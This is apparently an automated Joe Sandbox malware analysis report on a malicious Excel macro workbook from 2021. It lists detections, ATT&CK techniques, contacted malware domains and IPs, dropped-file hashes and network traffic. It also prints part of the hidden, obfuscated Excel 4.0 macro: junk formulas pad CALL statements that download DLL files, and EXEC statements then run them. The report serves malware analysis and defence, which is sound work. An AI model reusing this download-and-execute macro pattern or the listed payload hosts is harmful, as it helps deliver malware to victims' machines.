Analysis Report documents-2112491607.xlsm
Overview
General Information
Detection
Hidden Macro 4.0
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormally large hidden Excel 4.0 Macro sheet
Machine Learning detection for dropped file
Office process drops PE file
Allocates a big amount of memory (probably used for heap spraying)
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Excel document contains an embedded macro which executes code when the document is opened
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
AV Detection: |
---|
Antivirus detection for URL or domain |
Source: | Avira URL Cloud: |
Machine Learning detection for dropped file |
Source: | Joe Sandbox ML: |
Source: | File opened: |
Software Vulnerabilities: |
---|
Document exploit detected (creates forbidden files) |
Source: | File created: |
Document exploit detected (drops PE files) |
Source: | File created: |
Document exploit detected (UrlDownloadToFile) |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) |
Source: | Process created: |
Source: | Memory has grown: |
Source: | DNS query: |
Source: | TCP traffic: |
Networking: |
---|
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) |
Source: | Snort IDS: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | HTTP traffic detected: |
Source: | File created: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: |
Found abnormally large hidden Excel 4.0 Macro sheet |
Source: | Initial sample: |
Office process drops PE file |
Source: | File created: |
Source: | Binary string: |
Source: | Classification label: |
Source: | File created: |
Source: | File read: |
Source: | Key opened: |
Source: | Process created: |
Source: | Window detected: |
Source: | Initial sample: |
Source: | Key opened: |
Source: | File opened: |
Source: | File created: |
Boot Survival: |
---|
Drops PE files to the user root directory |
Source: | File created: |
Source: | Process information set: |
Source: | Dropped PE file which has not been started: |
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | Path Interception | Process Injection1 | Masquerading121 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution43 | Boot or Logon Initialization Scripts | Extra Window Memory Injection1 | Disable or Modify Tools1 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol13 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection1 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer4 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting21 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Extra Window Memory Injection1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Joe Sandbox ML | |||
100% | Joe Sandbox ML |
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
4% | Virustotal | Browse | ||
2% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
kautilyaclasses.com | 192.185.56.250 | true | false | | unknown |
bodylanguage.santulan.co.in | 111.118.215.222 | true | true | | unknown |
corwin-tommie06f.ru.com | 8.211.4.209 | true | false | | unknown |
katelynn9506a.ru.com | 8.211.4.209 | true | false | | unknown |
kullumanalitours.com | 103.211.216.55 | true | false | | unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
 | false | | unknown |
 | true | | unknown |
 | false | | unknown |
 | true | | unknown |
 | true | | unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
 | | false | | low |
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
103.211.216.55 | kullumanalitours.com | Seychelles | | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false |
192.185.56.250 | kautilyaclasses.com | United States | | 46606 | UNIFIEDLAYER-AS-1US | false |
8.211.4.209 | corwin-tommie06f.ru.com | Singapore | | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false |
111.118.215.222 | bodylanguage.santulan.co.in | India | | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 383123 |
Start date: | 07.04.2021 |
Start time: | 09:14:09 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 38s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | documents-2112491607.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 9 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.expl.evad.winXLSM@11/12@5/4 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: | |
Cookbook Comments: | |
Warnings: | |
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
103.211.216.55 | | | malicious | | |
192.185.56.250 | | | malicious | | |
8.211.4.209 | | | malicious | | |
111.118.215.222 | | | malicious | | |
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
bodylanguage.santulan.co.in | | | malicious | | |
kullumanalitours.com | | | malicious | | |
corwin-tommie06f.ru.com | | | malicious | | |
kautilyaclasses.com | | | malicious | | |
katelynn9506a.ru.com | | | malicious | | |
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | | | malicious | | |
UNIFIEDLAYER-AS-1US | | | malicious | | |
PUBLIC-DOMAIN-REGISTRYUS | | | malicious | | |
PUBLIC-DOMAIN-REGISTRYUS | | | malicious | | |
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 138083 |
Entropy (8bit): | 5.497215326378405 |
Encrypted: | false |
SSDEEP: | 1536:tm15JsYYm3GCVS7ZicTJzRVd620ZmB9RMli0msUdqZEACW4jySTLW:eLsacThRVd6pmBPM07vYZEA4/W |
MD5: | A26AB60FB8F4C1FCB0A37955433F241B |
SHA1: | E5316BCF28CA90B78A7CDBDE64B2DBC05A7A8D3B |
SHA-256: | 3D383CC929E2A80A8466767FAF9726E56CDA26DEC1D9249DF447629A6A113BB6 |
SHA-512: | CA5CA64E4A7A6A366BB1335C9339D40ECC2ECC9B393AC6D0DB74FA0D995155E39286FB9FBE096C252A2AD7E33A892039960503A0DE1F9805CCDD8E197525D2AD |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
IE Cache URL: | http://bodylanguage.santulan.co.in/ds/index.html |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 8301 |
Entropy (8bit): | 7.970711494690041 |
Encrypted: | false |
SSDEEP: | 192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh |
MD5: | D8574C9CC4123EF67C8B600850BE52EE |
SHA1: | 5547AC473B3523BA2410E04B75E37B1944EE0CCC |
SHA-256: | ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B |
SHA-512: | 20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 8854 |
Entropy (8bit): | 7.949751503848125 |
Encrypted: | false |
SSDEEP: | 192:VS+uZNogNC+NXtYvselFpeBnmMYCft0gVaSgZTaG+3uWYvVZmSGQ9pFT+x5ylxvr:03CbJ+mMYCmgUrNaB3uzvPm1UpFimlxj |
MD5: | 780FD0ABF9055E2D8FA1BAB6D4B9163E |
SHA1: | CFCD5C73C9C517161DEC8D4B01ABFCA4B272AEBE |
SHA-256: | 6A3CDBFDB8911742673C2882E912369BC525A7BD41C9B6EFC5C9A84DAFF6C3B2 |
SHA-512: | 8359AF512FA5771EB542B1A854F15E74555C7E1F956924520AC6CEBBAE1322D27AC8FBDD390275C5A31223613986B0CBF5871A406CA2DDBB996B9EB7A94E871A |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 557 |
Entropy (8bit): | 7.343009301479381 |
Encrypted: | false |
SSDEEP: | 12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd |
MD5: | A516B6CB784827C6BDE58BC9D341C1BD |
SHA1: | 9D602E7248E06FF639E6437A0A16EA7A4F9E6C73 |
SHA-256: | EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074 |
SHA-512: | C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 848 |
Entropy (8bit): | 7.595467031611744 |
Encrypted: | false |
SSDEEP: | 24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc |
MD5: | 02DB1068B56D3FD907241C2F3240F849 |
SHA1: | 58EC338C879DDBDF02265CBEFA9A2FB08C569D20 |
SHA-256: | D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F |
SHA-512: | 9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 96847 |
Entropy (8bit): | 7.870690149733864 |
Encrypted: | false |
SSDEEP: | 1536:m/JIWQub3DLc6SqhlWxDbl2hawHusD9Byrty30wEGttZv9xEfgI:GJIW9bTdS7lMHfD9ByrtyOG7ZVxET |
MD5: | 00AF2D8EB13A69B0A52ABFB800D69F9F |
SHA1: | 3AF09FD82CCA333CC70CB6394A7EC315F5FE6AF1 |
SHA-256: | 0B91BE6A537CF8CA45B5CAD74C244466C36150D0814A624D1A98CEF08B69F603 |
SHA-512: | 2214669F1315B5F60B2E300B873AC98EBF2A0C57943FCEEB4ED41D431C6D8708D5EAD2A7F2D510C45AAC2321CC45292EEE7E504CD304A618DCC65A69DEAFE226 |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.489142053628293 |
Encrypted: | false |
SSDEEP: | 12:85QENcLgXg/XAlCPCHaXtB8XzB/XURvX+WnicvbRbDtZ3YilMMEpxRljK5TdJP9O:85JK/XTd6j0YeBDv3qYrNru/ |
MD5: | 9C40617F346B87D23DC5454B7267E33A |
SHA1: | B87124245ACDB8EDF4EE972366790CC463CDBDDC |
SHA-256: | 223CD23880148DA3DEC1729E43E7735385478231A1BDE95A0E89C438C420623B |
SHA-512: | 097B24FAE265EC38060C7B05B10025503D2E49FC3E099853E913841E42C6E7BB4AA0EE7EA6F39710C6533D49C3CAEA3E24E42A16D1F127587794E4CCCBE1D3E1 |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2138 |
Entropy (8bit): | 4.547087478186962 |
Encrypted: | false |
SSDEEP: | 24:8bz2/XTd6jFyD2nhe8WDv3qYdM7dD2bz2/XTd6jFyD2nhe8WDv3qYdM7dV:8+/XT0jFY2nhdYQh2+/XT0jFY2nhdYQ/ |
MD5: | FD2F42E72FB642FA79B3F38914DB4B03 |
SHA1: | 96D1AD382852122C29334DFB5CE89A13DD14C8F3 |
SHA-256: | 8C69F2F1A47257D91955C5E9AC888608AA6234EEECFEAD7BCEB4B268B747ECBA |
SHA-512: | 069397B0B527C31C843AAEBF778965D48E446F0958B536D57CE7C5DA68A801C90FA90699DFBFD1C68FCC93FB06EBFA5A6BE204BAA47FD089F4597C050A8073BB |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 115 |
Entropy (8bit): | 4.745678829632436 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWKS9LRzcOHZELRzcOHmxWKS9LRzcOHv:dj49Ll5ELlt9LlP |
MD5: | 153B80C9C6025C6926C8F0A15B781156 |
SHA1: | A4B5E632F8E2282BA31EF56938E23F0BAC5DAD1F |
SHA-256: | 1E02E4944F11BD25D085F2B96AECB9912DEBC942C411D1E85603DFFCF69E2F65 |
SHA-512: | 7EDD7295338EFC23F23A3B55F3AD1832A297701F58CB68AF080594D8C119BA3FBAB32BC55DCFBA231C65E40E5CA313A74217B2B8948F035ECA6979281E4165F4 |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 96847 |
Entropy (8bit): | 7.870690149733864 |
Encrypted: | false |
SSDEEP: | 1536:m/JIWQub3DLc6SqhlWxDbl2hawHusD9Byrty30wEGttZv9xEfgI:GJIW9bTdS7lMHfD9ByrtyOG7ZVxET |
MD5: | 00AF2D8EB13A69B0A52ABFB800D69F9F |
SHA1: | 3AF09FD82CCA333CC70CB6394A7EC315F5FE6AF1 |
SHA-256: | 0B91BE6A537CF8CA45B5CAD74C244466C36150D0814A624D1A98CEF08B69F603 |
SHA-512: | 2214669F1315B5F60B2E300B873AC98EBF2A0C57943FCEEB4ED41D431C6D8708D5EAD2A7F2D510C45AAC2321CC45292EEE7E504CD304A618DCC65A69DEAFE226 |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
MD5: | 96114D75E30EBD26B572C1FC83D1D02E |
SHA1: | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
SHA-256: | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
SHA-512: | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
Malicious: | true |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 138083 |
Entropy (8bit): | 5.497215326378405 |
Encrypted: | false |
SSDEEP: | 1536:tm15JsYYm3GCVS7ZicTJzRVd620ZmB9RMli0msUdqZEACW4jySTLW:eLsacThRVd6pmBPM07vYZEA4/W |
MD5: | A26AB60FB8F4C1FCB0A37955433F241B |
SHA1: | E5316BCF28CA90B78A7CDBDE64B2DBC05A7A8D3B |
SHA-256: | 3D383CC929E2A80A8466767FAF9726E56CDA26DEC1D9249DF447629A6A113BB6 |
SHA-512: | CA5CA64E4A7A6A366BB1335C9339D40ECC2ECC9B393AC6D0DB74FA0D995155E39286FB9FBE096C252A2AD7E33A892039960503A0DE1F9805CCDD8E197525D2AD |
Malicious: | true |
Antivirus: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.8821840433354 |
TrID: |
|
File name: | documents-2112491607.xlsm |
File size: | 96877 |
MD5: | cada6b07929cd03002206f65f547f383 |
SHA1: | e4b72830f1f320d711f60f540a8fe9340597238e |
SHA256: | b9b231cad810dedef1d27772b12d04e8aa4e9ef0f461d5a0fbf80d3c38918860 |
SHA512: | 930c2ed9bf01b1c22189985f47800b11b2d116d5210a6f712f12ea25d7d4d52c165b7c9531d902487e341d9ebf35c4f3768ada1299b0ad9cab91d95f1b36fc15 |
SSDEEP: | 1536:4h1M4Kfra8zxQz8jbztonsBjFC6QomaIRUxPLe96bGAfe2hawno:4h1M4kra8Wz8jbzSn4BC6Qdkx60WMo |
File Content Preview: | PK..........!...`.............[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2aa8aa4bcbcac |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "documents-2112491607.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""..\oeiwkd""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL(""U""&AM19&""n"",AM20&""A"",AM30,'Doc2'!AR84,before.2.0.0.sheet!AM23,before.2.0.0.sheet!AO15&"".dll"",0,0)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&AO15)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL(""U""&AM19&""n"",AM20&""A"",AM30,'Doc2'!AR84,before.2.0.0.sheet!AM24,before.2.0.0.sheet!AO15&""1""&"".dll"",0,0)",,,,"=EXEC(AM34&BP106)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&BP107)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND
()=FACT(59)=SUMXMY2(452354,45245)=CALL(""U""&AM19&""n"",AM20&""A"",AM30,'Doc2'!AR84,before.2.0.0
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
04/07/21-09:15:05.069854 | TCP | 2009897 | ET TROJAN Possible Windows executable sent when remote host claims to send html content | 80 | 49171 | 111.118.215.222 | 192.168.2.22 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 7, 2021 09:15:00.593981028 CEST | 192.168.2.22 | 8.8.8.8 | 0xfda2 | Standard query (0) | | A (IP address) | IN (0x0001) |
Apr 7, 2021 09:15:01.338613033 CEST | 192.168.2.22 | 8.8.8.8 | 0x5115 | Standard query (0) | | A (IP address) | IN (0x0001) |
Apr 7, 2021 09:15:02.082560062 CEST | 192.168.2.22 | 8.8.8.8 | 0x78b6 | Standard query (0) | | A (IP address) | IN (0x0001) |
Apr 7, 2021 09:15:02.689320087 CEST | 192.168.2.22 | 8.8.8.8 | 0x9610 | Standard query (0) | | A (IP address) | IN (0x0001) |
Apr 7, 2021 09:15:04.330058098 CEST | 192.168.2.22 | 8.8.8.8 | 0xed69 | Standard query (0) | | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 7, 2021 09:15:00.904869080 CEST | 8.8.8.8 | 192.168.2.22 | 0xfda2 | No error (0) | | | 8.211.4.209 | A (IP address) | IN (0x0001) |
Apr 7, 2021 09:15:01.638679981 CEST | 8.8.8.8 | 192.168.2.22 | 0x5115 | No error (0) | | | 8.211.4.209 | A (IP address) | IN (0x0001) |
Apr 7, 2021 09:15:02.225878000 CEST | 8.8.8.8 | 192.168.2.22 | 0x78b6 | No error (0) | | | 192.185.56.250 | A (IP address) | IN (0x0001) |
Apr 7, 2021 09:15:03.091237068 CEST | 8.8.8.8 | 192.168.2.22 | 0x9610 | No error (0) | | | 103.211.216.55 | A (IP address) | IN (0x0001) |
Apr 7, 2021 09:15:04.754915953 CEST | 8.8.8.8 | 192.168.2.22 | 0xed69 | No error (0) | | | 111.118.215.222 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49167 | 8.211.4.209 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 09:15:00.939644098 CEST | 0 | OUT | |
Apr 7, 2021 09:15:01.327353001 CEST | 1 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
